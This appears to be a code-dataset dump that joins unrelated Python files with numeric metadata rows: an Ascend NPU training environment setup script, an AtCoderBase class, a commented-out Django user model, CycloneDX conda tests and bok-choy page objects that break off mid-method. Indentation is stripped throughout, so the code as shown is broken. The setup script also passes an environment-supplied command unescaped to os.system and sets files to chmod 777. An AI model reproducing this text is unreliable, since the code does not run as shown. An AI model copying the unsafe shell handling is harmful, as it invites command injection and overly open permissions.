hccl_data["group_count"] = "1"
hccl_data["status"] = "completed"
hccl_data["group_list"] = []
group = {}
#group["device_count"] = worker_num * 8
group["instance_count"] = str(worker_num)
group["group_name"] = "test"
group["instance_list"] = []
## 生成npu_idx.info文件
## 文件数量和worker个数一致
while True:
PATH = npu_dir + ('/npu_%d.info' % (done))
if os.path.isfile(PATH) and os.access(PATH, os.R_OK):
with open(PATH, "r") as f:
ips = ""
host_ip = ""
# 文件中的格式:
# ip=id1:ip1,id2:ip2
# host=xxx
for line in f:
print(line)
if "ip=" in line:
_, ips = line.strip().split("=")
elif "host=" in line:
_, host_ip = line.strip().split("=")
instance_item = {} # item of instance list
if distributing_job is True:
instance_item["pod_name"] = job_id + "-worker-" + str(done)
else:
instance_item["pod_name"] = pod_name
instance_item["server_id"] = host_ip
instance_item["devices"] = []
# parse string to get all device ips
ip_list = ips.split(",")
ip_list = sorted(ip_list)
for ip_elem in ip_list:
# one device
device_id, device_ip = ip_elem.split(":")
## set up group list
device_item = {
"device_id" : device_id,
"device_ip" : device_ip
}
# append to instance list
rank_id = rank_id + 1
instance_item["devices"].append(device_item)
#pdb.set_trace()
group["instance_list"].append(instance_item)
f.close()
done = done + 1
else:
pass
if done == worker_num:
break
else:
pass
time.sleep(1)
group["device_count"] = str(rank_id)
group["instance_count"] = str(len(group["instance_list"]))
hccl_data["group_list"].append(group)
print("succ!")
# dump to json file
with open(npu_dir + '/hccl_tf.json', 'w') as fp:
json.dump(hccl_data, fp)
return
# 从/pod.env导入环境变量
def load_env(file_path):
envs = {}
with open(file_path, "r") as f:
lines = f.readlines()
for line in lines:
line = line.strip().lstrip("export")
if line is not "" and "=" in line:
key_val = line.strip().split("=")
key = key_val[0]
value = key_val[1]
envs[key] = value
else:
pass
f.close()
return envs
# 向/pod.env写入环境变量
# 先判断是否存在此环境量,如果已存在,则覆盖
def add_env(path, envs):
# 覆盖相同key数据,文件已有的key保持不变
envs_orig = load_env(path)
for k, v in envs.items():
envs_orig[k] = v
with open(path, "w") as f:
for k, v in envs_orig.items():
f.write("export %s=%s\n" % (k, v))
f.close()
return
def get_os_flag():
osflag="x86_64"
if platform.machine() == "aarch64":
osflag = "arm64"
else:
pass
return osflag
# gnu安装目录中的架构和算法组件的不一样
# 单独处理
def get_gnu_arch_flag():
osflag="x86_64"
if platform.machine() == "aarch64":
osflag = "aarch64"
else:
pass
return osflag
def get_random_num(length):
return ''.join(random.choice(string.digits) for _ in range(length))
# 用于将环境变量更新 写入指定用户的shell加载文件
def set_bashrc(username):
path = ""
if username == "root":
path = "/root/.bashrc"
else:
path = "/home/" + username + "/.bashrc"
with open(path, "a") as f:
cmd = '''
if [ -f "/pod.env" ]; then
. /pod.env
fi
'''
f.write(cmd + "\n")
f.close()
return
# 准备mindspore环境
# 1) 预备环境变量,并写入/pod.env
# 2) 创建算法需要的训练shell脚本
# 3) 创建算法需要的hccl文件
def handle_mindspore():
path = "/pod.env"
envs = load_env(path) # 导入平台加载过程中已创建的环境变量
envs_to_add= {}
envs_to_add["DEVICE_ID"] = "0"
# 解析GPU/NPU设备ID
if "VISIBLE_IDS" in envs:
envs["VISIBLE_IDS"] = envs["VISIBLE_IDS"].replace("\\","")
envs_to_add["VISIBLE_IDS"] = envs["VISIBLE_IDS"]
else:
pass
# 解析NPU Device ID
if "NPU_IPS" in envs:
envs["NPU_IPS"] = envs["NPU_IPS"].replace("\\","")
envs_to_add["NPU_IPS"] = envs["NPU_IPS"]
else:
pass
## 将/pod.env已有的环境变量
## 与os当前具有的环境变量合并, 放入envs
for k, v in os.environ.items():
if k not in envs:
envs[k] = v
else:
pass
## 不需要解析device id
## 设置随机参数, 算法要求
envs["RANDOM"] = get_random_num(6)
envs["osflag"] = get_os_flag()
envs["gnu_arch"] = get_gnu_arch_flag()
# mindspore环境变量模板
mindspore_envs = [
"PYTHONPATH=/usr/local/lib/python3.7/site-packages/mindspore/lib:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/${osflag}-linux/opp/op_impl/built-in/ai_core/tbe:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/pyACL/python/site-packages/acl:${PYTHONPATH}",
"LD_LIBRARY_PATH=/usr/lib/${gnu_arch}-linux-gnu/hdf5/serial:/usr/local/Ascend/add-ons/:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/fwkacllib/lib64:/usr/local/Ascend/add-ons:/home/HwHiAiUser/Ascend/nnae/latest/fwkacllib/lib64:/usr/local/Ascend/driver/lib64/common/:/usr/local/Ascend/driver/lib64/driver/:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/opp/op_impl/built-in/ai_core/tbe/op_tiling:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/${osflag}-linux/atc/lib64:/usr/local/Ascend/fwkacllib/lib64/:/usr/local/lib/python3.7/site-packages/mindspore/lib/:/usr/local/lib/python3.7/site-packages/torch/lib:/usr/local/lib:/home/clang+llvm/lib/:$LD_LIBRARY_PATH",
"TBE_IMPL_PATH=/home/HwHiAiUser/Ascend/ascend-toolkit/latest/${osflag}-linux/opp/op_impl/built-in/ai_core/tbe:/usr/local/Ascend/ascend-toolkit/latest/opp/op_impl/built-in/ai_core/tbe",
"PATH=$PATH:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/${osflag}-linux/fwkacllib/ccec_compiler/bin/:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/fwkacllib/ccec_compiler/bin/:/home/clang+llvm/bin/:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/atc/bin",
"ASCEND_OPP_PATH=/home/HwHiAiUser/Ascend/ascend-toolkit/latest/opp",
"LLVM_CONFIG=/home/clang+llvm/bin/llvm-config",
"SOC_VERSION=Ascend910",
"POD_NAME=${DLWS_JOB_ID}",
"JOB_ID=${RANDOM}",
"RANK_SIZE=1",
"ASCEND_GLOBAL_LOG_LEVEL=3",
"ASCEND_GLOBAL_EVENT_ENABLE=0"
]
# 模板渲染
for item in mindspore_envs:
tpl = string.Template(item)
new_item = tpl.safe_substitute(envs)
if "=" in new_item:
key_val = new_item.strip().split("=")
k = key_val[0]
v = key_val[1]
envs_to_add[k] = v
else:
pass
# 1) 更新/pod.env, 创建环境变量
add_env(path, envs_to_add)
# 2) 生成shell训练脚本
pod_cmd = os.environ["DLWS_LAUNCH_CMD"]
npu_info_dir = "/home/" + os.environ["DLWS_USER_NAME"] + "/.npu/" + os.environ["DLWS_JOB_ID"] + "/train.sh"
cmd = 'python /pod/scripts/create_script.py --type mindspore --command "%s" --out %s'% (pod_cmd, npu_info_dir)
os.system(cmd)
os.system("chmod 777 " + npu_info_dir)
# 将环境变量更新写入 root
set_bashrc("root")
## 3) 生成hccl_tf.json
if need_create_hccl() is True:
create_hccl_mindspore()
else:
pass
# 4) 分布式训练任务,环境配置同步
if is_distributed_job() is True and is_ps_pod() is True:
notify()
elif is_distributed_job() is True and is_worker_pod() is True:
wait()
else:
pass
return
# 准备tensorflow环境
# 1) 预备环境变量,并写入/pod.env
# 2) 创建算法需要的训练shell脚本
# 3) 创建算法需要的hccl文件
def handle_tensorflow():
# 1) 预备环境变量,并写入/pod.env
path = "/pod.env"
envs = load_env(path) # 导入平台加载过程中已创建的环境变量
envs_to_add= {}
# 解析GPU/NPU设备ID
if "VISIBLE_IDS" in envs:
envs["VISIBLE_IDS"] = envs["VISIBLE_IDS"].replace("\\","")
envs_to_add["VISIBLE_IDS"] = envs["VISIBLE_IDS"]
else:
pass
if "NPU_IPS" in envs:
envs["NPU_IPS"] = envs["NPU_IPS"].replace("\\","")
envs_to_add["NPU_IPS"] = envs["NPU_IPS"]
else:
pass
## 将/pod.env已有的环境变量
## 与os当前具有的环境变量合并, 放入envs
for k, v in os.environ.items():
if k not in envs:
envs[k] = v
else:
pass
## 第一个设备id
device_id="0"
device_index="0"
if "VISIBLE_IDS" in envs:
devid = envs["VISIBLE_IDS"].split(",")[0].strip()
if len(devid) > 0:
device_id = devid
else:
pass
else:
pass
device_index = device_id
## 设置随机参数
envs["RANDOM"] = get_random_num(6)
envs["osflag"] = get_os_flag()
envs["gnu_arch"] = get_gnu_arch_flag()
# 模板配置
tensorflow_envs = [
"PYTHONPATH=/usr/local/lib/python3.7/site-packages/mindspore/lib:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/${osflag}-linux/opp/op_impl/built-in/ai_core/tbe:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/pyACL/python/site-packages/acl:${PYTHONPATH}",
"LD_LIBRARY_PATH=/usr/lib/${gnu_arch}-linux-gnu/hdf5/serial:/usr/local/Ascend/add-ons/:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/fwkacllib/lib64:/usr/local/Ascend/add-ons:/home/HwHiAiUser/Ascend/nnae/latest/fwkacllib/lib64:/usr/local/Ascend/driver/lib64/common/:/usr/local/Ascend/driver/lib64/driver/:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/opp/op_impl/built-in/ai_core/tbe/op_tiling:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/${osflag}-linux/atc/lib64:/usr/local/Ascend/fwkacllib/lib64/:/usr/local/lib/python3.7/site-packages/mindspore/lib/:/usr/local/lib/python3.7/site-packages/torch/lib:/usr/local/lib:/home/clang+llvm/lib/:$LD_LIBRARY_PATH",
"TBE_IMPL_PATH=/home/HwHiAiUser/Ascend/ascend-toolkit/latest/${osflag}-linux/opp/op_impl/built-in/ai_core/tbe:/usr/local/Ascend/ascend-toolkit/latest/opp/op_impl/built-in/ai_core/tbe",
"PATH=$PATH:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/${osflag}-linux/fwkacllib/ccec_compiler/bin/:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/fwkacllib/ccec_compiler/bin/:/home/clang+llvm/bin/:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/atc/bin",
"ASCEND_OPP_PATH=/home/HwHiAiUser/Ascend/ascend-toolkit/latest/opp",
"LLVM_CONFIG=/home/clang+llvm/bin/llvm-config",
"SOC_VERSION=Ascend910",
"POD_NAME=${DLWS_JOB_ID}",
"JOB_ID=${RANDOM}",
"RANK_SIZE=1",
"ASCEND_GLOBAL_LOG_LEVEL=3",
"ASCEND_GLOBAL_EVENT_ENABLE=0"
]
envs_to_add["DEVICE_ID"] = device_id
envs_to_add["DEVICE_INDEX"] = device_index
# 渲染模板
for item in tensorflow_envs:
tpl = string.Template(item)
new_item = tpl.safe_substitute(envs)
if "=" in new_item:
key_val = new_item.strip().split("=")
k = key_val[0]
v = key_val[1]
envs_to_add[k] = v
else:
pass
# 1) 更新环境变量
add_env(path, envs_to_add)
## 2) 生成shell脚本
pod_cmd = os.environ["DLWS_LAUNCH_CMD"]
npu_info_dir = "/home/" + os.environ["DLWS_USER_NAME"] + "/.npu/" + os.environ["DLWS_JOB_ID"] + "/train.sh"
cmd = 'python /pod/scripts/create_script.py --type tensorflow --command "%s" --out %s'% (pod_cmd, npu_info_dir)
print(cmd, "==========================")
os.system(cmd)
os.system("chmod 777 " + npu_info_dir)
# 更新用户bash脚本
set_bashrc("root")
# 3) 生成hccl_tf.json
if need_create_hccl() is True:
create_hccl_tensorflow()
else:
pass
# 4) 分布式训练任务,环境配置同步
if is_distributed_job() is True and is_ps_pod() is True:
notify()
elif is_distributed_job() is True and is_worker_pod() is True:
wait()
else:
pass
return
# 是否分布式训练任务
def is_distributed_job():
if "DLWS_NUM_PS" in os.environ:
dlws_num_ps = os.environ["DLWS_NUM_PS"].strip().lower()
if len(dlws_num_ps) > 0 and int(dlws_num_ps) >0:
print("is_distributed_job return true")
return True
return False
# 是否master节点
def is_ps_pod():
if "DLWS_ROLE_NAME" in os.environ:
dlws_role_name = os.environ["DLWS_ROLE_NAME"].strip().lower()
## Ps表示多机多卡ps pod
if dlws_role_name == "ps":
return True
return False
# 是否worker节点
def is_worker_pod():
if "DLWS_ROLE_NAME" in os.environ:
dlws_role_name = os.environ["DLWS_ROLE_NAME"].strip().lower()
## Ps表示多机多卡ps pod
if dlws_role_name == "worker":
return True
return False
# 分布式训练任务
# ps节点在环境预备结束后,创建setup_environment_done文件
# 用作环境准备完成的标识
def notify():
# 单机训练任务,只有一个POD不需要做协同
if is_distributed_job() is False:
return
setup_environment_done = "/home/" + os.environ["DLWS_USER_NAME"] + "/.npu/" + os.environ["DLWS_JOB_ID"] + "/setup_environment_done"
# 多机多卡训练,ps节点预备环境
if not os.path.exists(setup_environment_done):
open(setup_environment_done, 'a').close()
return
# 分布式训练任务
# worker节点通过检查setup_environment_done文件
# 来判断环境准备是否结束
def wait():
# 单机训练任务,只有一个POD不需要等待环境
if is_distributed_job() is False:
return
setup_environment_done = "/home/" + os.environ["DLWS_USER_NAME"] + "/.npu/" + os.environ["DLWS_JOB_ID"] + "/setup_environment_done"
# 多机多卡训练,ps节点预备环境
while True:
if not os.path.exists(setup_environment_done):
print("===========", setup_environment_done, " not found. wait")
time.sleep(1)
else:
break
return
# 1) 单机训练中,需要创建hccl文件
# 2)多机多卡中,需要在ps pod创建hccl文件, 此文件会被worker pod共同读取
def need_create_hccl():
if "DLWS_ROLE_NAME" in os.environ:
dlws_role_name = os.environ["DLWS_ROLE_NAME"].strip().lower()
## master表示单机POD
## Ps表示多机多卡ps pod
if dlws_role_name == "ps" or dlws_role_name == "master":
return True
return False
if __name__ == "__main__":
# 1) 训练框架类别由前端传入
# 本脚本依据此字段, 为不同框架创建不同的环境参数
# hccl文件、环境变量等等
# 2) 脚本经平台bootstrap.sh调用
# 仅在JOB为单机节点或者 分布式任务的PS节点被执行
if "aiframework" in os.environ:
framework = os.environ["aiframework"].strip().lower()
if framework == "tensorflow":
handle_tensorflow()
elif framework == "mindspore":
handle_mindspore()
else:
handle_tensorflow()
else:
# 兼容版本<v1.3.0
create_hccl_mindspore()
create_hccl_tensorflow()
pass
| 27.58156 | 665 | 0.572229 | 2,429 | 19,445 | 4.358995 | 0.149033 | 0.034851 | 0.040518 | 0.051946 | 0.71071 | 0.682471 | 0.672837 | 0.652153 | 0.63912 | 0.612391 | 0 | 0.011766 | 0.2919 | 19,445 | 704 | 666 | 27.620739 | 0.757208 | 0.108871 | 0 | 0.682039 | 0 | 0.024272 | 0.299616 | 0.188518 | 0 | 0 | 0.000349 | 0 | 0 | 1 | 0.038835 | false | 0.063107 | 0.01699 | 0.002427 | 0.109223 | 0.01699 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
0a1a442445edbbf33c834651505d8bea1866c36d | 485 | py | Python | src/atcoderbase.py | scnsh/python-circlci-test | af6be3d78c5428984368fd1c06214d5030159273 | [
"Apache-2.0"
] | null | null | null | src/atcoderbase.py | scnsh/python-circlci-test | af6be3d78c5428984368fd1c06214d5030159273 | [
"Apache-2.0"
] | 1 | 2021-06-02T00:32:09.000Z | 2021-06-02T00:32:09.000Z | src/atcoderbase.py | scnsh/python-circlci-test | af6be3d78c5428984368fd1c06214d5030159273 | [
"Apache-2.0"
] | null | null | null | from collections import deque
from typing import List
class AtCoderBase:
def __init__(self, all_input: List[str]):
self.all_input = deque(all_input)
self.ret_str = ""
self.msg = list()
def input(self):
def _input() -> str:
line = self.all_input.pop()
yield line
return _input().__next__()
def print(self, data):
self.msg.append(str(data))
def process(self):
raise NotImplementedError
| 22.045455 | 45 | 0.595876 | 59 | 485 | 4.644068 | 0.457627 | 0.116788 | 0.131387 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.298969 | 485 | 21 | 46 | 23.095238 | 0.805882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3125 | false | 0 | 0.125 | 0 | 0.5625 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
0a1cec95b806ee342e5c51684a037783edbfb5ee | 5,262 | py | Python | appSchool/models.py | NandyAkash/Sma | 60b247d7b213516b94347626d09a8f329a70aa90 | [
"MIT"
] | null | null | null | appSchool/models.py | NandyAkash/Sma | 60b247d7b213516b94347626d09a8f329a70aa90 | [
"MIT"
] | null | null | null | appSchool/models.py | NandyAkash/Sma | 60b247d7b213516b94347626d09a8f329a70aa90 | [
"MIT"
] | null | null | null | # import jwt
# from datetime import datetime, timedelta
# from django.conf import settings
# from django.contrib.auth.models import (
# AbstractBaseUser, BaseUserManager, PermissionsMixin
# )
# from django.db import models
# # Create your models here.
# class UserManager(BaseUserManager):
# """
# Django requires that custom users define their own Manager class. By
# inheriting from `BaseUserManager`, we get a lot of the same code used by
# Django to create a `User`.
# All we have to do is override the `create_user` function which we will use
# to create `User` objects.
# """
# def create_user(self, username, password= None):
# """Create and return a `User` with an role, username and password."""
# if username is None:
# raise TypeError('Users must have a username.')
# # if roles is None:
# # raise TypeError('Users must have a role.')
# user = self.model(username = username)
# user.set_password(password)
# user.save()
# return user
# def create_superuser(self, username, password):
# """
# Create and return a `User` with superuser (admin) permissions.
# """
# if password is None:
# raise TypeError('Superusers must have a password.')
# user = self.create_user(username, password)
# user.is_superuser = True
# user.is_staff = True
# user.save()
# return user
# class Role(models.Model):
# '''
# The Role entries are managed by the system,
# automatically created via a Django data migration.
# '''
# TEACHER = 2
# ADMIN = 1
# ROLE_CHOICES = (
# (TEACHER, 'teacher'),
# (ADMIN, 'admin'),
# )
# id = models.PositiveSmallIntegerField(choices=ROLE_CHOICES, primary_key=True)
# def __str__(self):
# return self.get_id_display()
# class User(AbstractBaseUser, PermissionsMixin):
# # Each `User` needs a human-readable unique identifier that we can use to
# # represent the `User` in the UI. We want to index this column in the
# # database to improve lookup performance.
# username = models.CharField(db_index=True, max_length=255, unique=True)
# # We also need a way to contact the user and a way for the user to identify
# # themselves when logging in. Since we need an email address for contacting
# # the user anyways, we will also use the email for logging in because it is
# # the most common form of login credential at the time of writing.
# roles = models.ManyToManyField(Role)
# # When a user no longer wishes to use our platform, they may try to delete
# # their account. That's a problem for us because the data we collect is
# # valuable to us and we don't want to delete it. We
# # will simply offer users a way to deactivate their account instead of
# # letting them delete it. That way they won't show up on the site anymore,
# # but we can still analyze the data.
# is_active = models.BooleanField(default=True)
# # The `is_staff` flag is expected by Django to determine who can and cannot
# # log into the Django admin site. For most users this flag will always be
# # false.
# is_staff = models.BooleanField(default=False)
# # A timestamp representing when this object was created.
# created_at = models.DateTimeField(auto_now_add=True)
# # A timestamp reprensenting when this object was last updated.
# updated_at = models.DateTimeField(auto_now=True)
# # More fields required by Django when specifying a custom user model.
# # The `USERNAME_FIELD` property tells us which field we will use to log in.
# # In this case we want it to be the username field.
# USERNAME_FIELD = 'username'
# # Tells Django that the UserManager class defined above should manage
# # objects of this type.
# objects = UserManager()
# def __str__(self):
# """
# Returns a string representation of this `User`.
# This string is used when a `User` is printed in the console.
# """
# return self.roles
# @property
# def token(self):
# """
# Allows us to get a user's token by calling `user.token` instead of
# `user.generate_jwt_token().
# The `@property` decorator above makes this possible. `token` is called
# a "dynamic property".
# """
# return self._generate_jwt_token()
# def get_full_name(self):
# """
# This method is required by Django for things like handling emails.
# Typically this would be the user's first and last name. Since we do
# not store the user's real name, we return their username instead.
# """
# return self.username
# def _generate_jwt_token(self):
# """
# Generates a JSON Web Token that stores this user's ID and has an expiry
# date set to 60 days into the future.
# """
# dt = datetime.now() + timedelta(days=60)
# token = jwt.encode({
# 'id': self.pk,
# 'exp': int(dt.strftime('%s'))
# }, settings.SECRET_KEY, algorithm='HS256')
# return token.decode('utf-8') | 34.847682 | 81 | 0.63664 | 699 | 5,262 | 4.731044 | 0.370529 | 0.009072 | 0.009979 | 0.018143 | 0.052011 | 0.035077 | 0.020562 | 0.020562 | 0 | 0 | 0 | 0.003395 | 0.27233 | 5,262 | 151 | 82 | 34.847682 | 0.860277 | 0.942037 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0a2017392a97b7e7533086af357c08827f45a3fb | 5,368 | py | Python | tests/test_utils_conda.py | woodruffw-forks/cyclonedx-python-lib | 395a0ec14ebcba8e0849a0ced30ec4163c42fa7a | [
"Apache-2.0"
] | null | null | null | tests/test_utils_conda.py | woodruffw-forks/cyclonedx-python-lib | 395a0ec14ebcba8e0849a0ced30ec4163c42fa7a | [
"Apache-2.0"
] | null | null | null | tests/test_utils_conda.py | woodruffw-forks/cyclonedx-python-lib | 395a0ec14ebcba8e0849a0ced30ec4163c42fa7a | [
"Apache-2.0"
] | null | null | null | # encoding: utf-8
# This file is part of CycloneDX Python Lib
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
# Copyright (c) OWASP Foundation. All Rights Reserved.
from unittest import TestCase
from cyclonedx.utils.conda import parse_conda_json_to_conda_package, parse_conda_list_str_to_conda_package, CondaPackage
class TestUtilsConda(TestCase):
def test_parse_conda_json_no_hash(self) -> None:
cp: CondaPackage = parse_conda_json_to_conda_package(
conda_json_str='{"base_url": "https://repo.anaconda.com/pkgs/main","build_number": 1003,"build_string": '
'"py39hecd8cb5_1003","channel": "pkgs/main","dist_name": "chardet-4.0.0-py39hecd8cb5_1003",'
'"name": "chardet","platform": "osx-64","version": "4.0.0"}'
)
self.assertIsInstance(cp, dict)
self.assertEqual(cp['base_url'], 'https://repo.anaconda.com/pkgs/main')
self.assertEqual(cp['build_number'], 1003)
self.assertEqual(cp['build_string'], 'py39hecd8cb5_1003')
self.assertEqual(cp['channel'], 'pkgs/main')
self.assertEqual(cp['dist_name'], 'chardet-4.0.0-py39hecd8cb5_1003')
self.assertEqual(cp['name'], 'chardet')
self.assertEqual(cp['platform'], 'osx-64')
self.assertEqual(cp['version'], '4.0.0')
self.assertIsNone(cp['md5_hash'])
def test_parse_conda_list_str_no_hash(self) -> None:
cp: CondaPackage = parse_conda_list_str_to_conda_package(
conda_list_str='https://repo.anaconda.com/pkgs/main/osx-64/chardet-4.0.0-py39hecd8cb5_1003.conda'
)
self.assertIsInstance(cp, dict)
self.assertEqual(cp['base_url'], 'https://repo.anaconda.com/pkgs/main')
self.assertEqual(cp['build_number'], 1003)
self.assertEqual(cp['build_string'], 'py39hecd8cb5_1003')
self.assertEqual(cp['channel'], 'pkgs/main')
self.assertEqual(cp['dist_name'], 'chardet-4.0.0-py39hecd8cb5_1003')
self.assertEqual(cp['name'], 'chardet')
self.assertEqual(cp['platform'], 'osx-64')
self.assertEqual(cp['version'], '4.0.0')
self.assertIsNone(cp['md5_hash'])
def test_parse_conda_list_str_with_hash_1(self) -> None:
cp: CondaPackage = parse_conda_list_str_to_conda_package(
conda_list_str='https://repo.anaconda.com/pkgs/main/noarch/tzdata-2021a-h52ac0ba_0.conda'
'#d42e4db918af84a470286e4c300604a3'
)
self.assertIsInstance(cp, dict)
self.assertEqual(cp['base_url'], 'https://repo.anaconda.com/pkgs/main')
self.assertEqual(cp['build_number'], 0)
self.assertEqual(cp['build_string'], 'h52ac0ba_0')
self.assertEqual(cp['channel'], 'pkgs/main')
self.assertEqual(cp['dist_name'], 'tzdata-2021a-h52ac0ba_0')
self.assertEqual(cp['name'], 'tzdata')
self.assertEqual(cp['platform'], 'noarch')
self.assertEqual(cp['version'], '2021a')
self.assertEqual(cp['md5_hash'], 'd42e4db918af84a470286e4c300604a3')
def test_parse_conda_list_str_with_hash_2(self) -> None:
cp: CondaPackage = parse_conda_list_str_to_conda_package(
conda_list_str='https://repo.anaconda.com/pkgs/main/osx-64/ca-certificates-2021.7.5-hecd8cb5_1.conda'
'#c2d0ae65c08dacdcf86770b7b5bbb187'
)
self.assertIsInstance(cp, dict)
self.assertEqual(cp['base_url'], 'https://repo.anaconda.com/pkgs/main')
self.assertEqual(cp['build_number'], 1)
self.assertEqual(cp['build_string'], 'hecd8cb5_1')
self.assertEqual(cp['channel'], 'pkgs/main')
self.assertEqual(cp['dist_name'], 'ca-certificates-2021.7.5-hecd8cb5_1')
self.assertEqual(cp['name'], 'ca-certificates')
self.assertEqual(cp['platform'], 'osx-64')
self.assertEqual(cp['version'], '2021.7.5')
self.assertEqual(cp['md5_hash'], 'c2d0ae65c08dacdcf86770b7b5bbb187')
def test_parse_conda_list_str_with_hash_3(self) -> None:
cp: CondaPackage = parse_conda_list_str_to_conda_package(
conda_list_str='https://repo.anaconda.com/pkgs/main/noarch/idna-2.10-pyhd3eb1b0_0.tar.bz2'
'#153ff132f593ea80aae2eea61a629c92'
)
self.assertIsInstance(cp, dict)
self.assertEqual(cp['base_url'], 'https://repo.anaconda.com/pkgs/main')
self.assertEqual(cp['build_number'], 0)
self.assertEqual(cp['build_string'], 'pyhd3eb1b0_0')
self.assertEqual(cp['channel'], 'pkgs/main')
self.assertEqual(cp['dist_name'], 'idna-2.10-pyhd3eb1b0_0')
self.assertEqual(cp['name'], 'idna')
self.assertEqual(cp['platform'], 'noarch')
self.assertEqual(cp['version'], '2.10')
self.assertEqual(cp['md5_hash'], '153ff132f593ea80aae2eea61a629c92')
| 48.8 | 120 | 0.669523 | 679 | 5,368 | 5.106038 | 0.209131 | 0.18604 | 0.210845 | 0.057687 | 0.702625 | 0.633112 | 0.612345 | 0.586674 | 0.533314 | 0.501586 | 0 | 0.070055 | 0.186289 | 5,368 | 109 | 121 | 49.247706 | 0.723672 | 0.124441 | 0 | 0.487179 | 0 | 0.089744 | 0.350064 | 0.095258 | 0 | 0 | 0 | 0 | 0.641026 | 1 | 0.064103 | false | 0 | 0.025641 | 0 | 0.102564 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0a2ca1886f9f977fe51fc6e706620020fca9a5b3 | 62 | py | Python | ground/__init__.py | lycantropos/ground | ef6f54b8cb555af8d9202d621cac57a892ecb78d | [
"MIT"
] | 4 | 2021-05-15T19:15:56.000Z | 2021-11-30T06:19:47.000Z | ground/__init__.py | lycantropos/ground | ef6f54b8cb555af8d9202d621cac57a892ecb78d | [
"MIT"
] | null | null | null | ground/__init__.py | lycantropos/ground | ef6f54b8cb555af8d9202d621cac57a892ecb78d | [
"MIT"
] | null | null | null | """Basis of computational geometry."""
__version__ = '7.1.1'
| 15.5 | 38 | 0.677419 | 8 | 62 | 4.75 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.055556 | 0.129032 | 62 | 3 | 39 | 20.666667 | 0.648148 | 0.516129 | 0 | 0 | 0 | 0 | 0.208333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0a32df1f7ec457a5eb7c5a6c86ff5d0cfd8ec8eb | 1,408 | py | Python | docs/code/round_3/pages.py | jzoldak/bok-choy | 340023f1a50d9ba40dbe0c8154d32d17a7ed1d1e | [
"Apache-2.0"
] | 63 | 2015-01-17T15:52:11.000Z | 2019-12-26T21:11:50.000Z | docs/code/round_3/pages.py | jzoldak/bok-choy | 340023f1a50d9ba40dbe0c8154d32d17a7ed1d1e | [
"Apache-2.0"
] | 202 | 2015-01-08T18:59:35.000Z | 2021-12-28T04:10:32.000Z | docs/code/round_3/pages.py | jzoldak/bok-choy | 340023f1a50d9ba40dbe0c8154d32d17a7ed1d1e | [
"Apache-2.0"
] | 21 | 2015-01-23T23:41:53.000Z | 2021-10-29T21:59:49.000Z | import re
from bok_choy.page_object import PageObject
class GitHubSearchResultsPage(PageObject):
"""
GitHub's search results page
"""
url = None
def is_browser_on_page(self):
# This should be something like: u'Search · foo bar · GitHub'
title = self.browser.title
matches = re.match('^Search .+ GitHub$', title)
return matches is not None
@property
def search_results(self):
"""
Return a list of results returned from a search
"""
return self.q(css='ul.repo-list > li > div > div > div.f4').text
class GitHubSearchPage(PageObject):
"""
GitHub's search page
"""
url = 'http://www.github.com/search'
def is_browser_on_page(self):
return self.q(css='button.btn').is_present()
def enter_search_terms(self, text):
"""
Fill the text into the input field
"""
self.q(css='#search_form input[type="text"]').fill(text)
def search(self):
"""
Click on the Search button and wait for the
results page to be displayed
"""
